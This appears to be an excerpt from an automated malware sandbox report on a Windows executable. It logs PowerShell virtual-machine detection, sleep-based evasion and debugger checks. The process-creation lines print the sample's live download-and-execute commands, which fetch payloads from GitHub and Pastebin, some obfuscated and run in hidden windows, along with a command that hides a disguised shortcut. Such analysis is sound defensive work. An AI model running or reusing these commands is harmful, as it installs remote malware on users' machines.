Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588078Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590781Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1834Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3075Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5212Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1721Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 435Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3160Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1146Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 856
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5483
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1333
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -588078s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep count: 435 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep count: 39 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2288Thread sleep count: 3160 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3788Thread sleep count: 1146 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1380Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2808Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep time: -590781s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep count: 856 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4220Thread sleep count: 240 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep count: 191 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 336Thread sleep count: 5483 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080Thread sleep count: 1333 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1796Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 32 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 92 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3716Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1796Thread sleep time: -590844s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 588078Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590781Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590844
Source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF32370 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF68EF32370
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF32370 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF68EF32370
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF31E94 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF68EF31E94
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF68EF32514 SetUnhandledExceptionFilter,0_2_00007FF68EF32514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
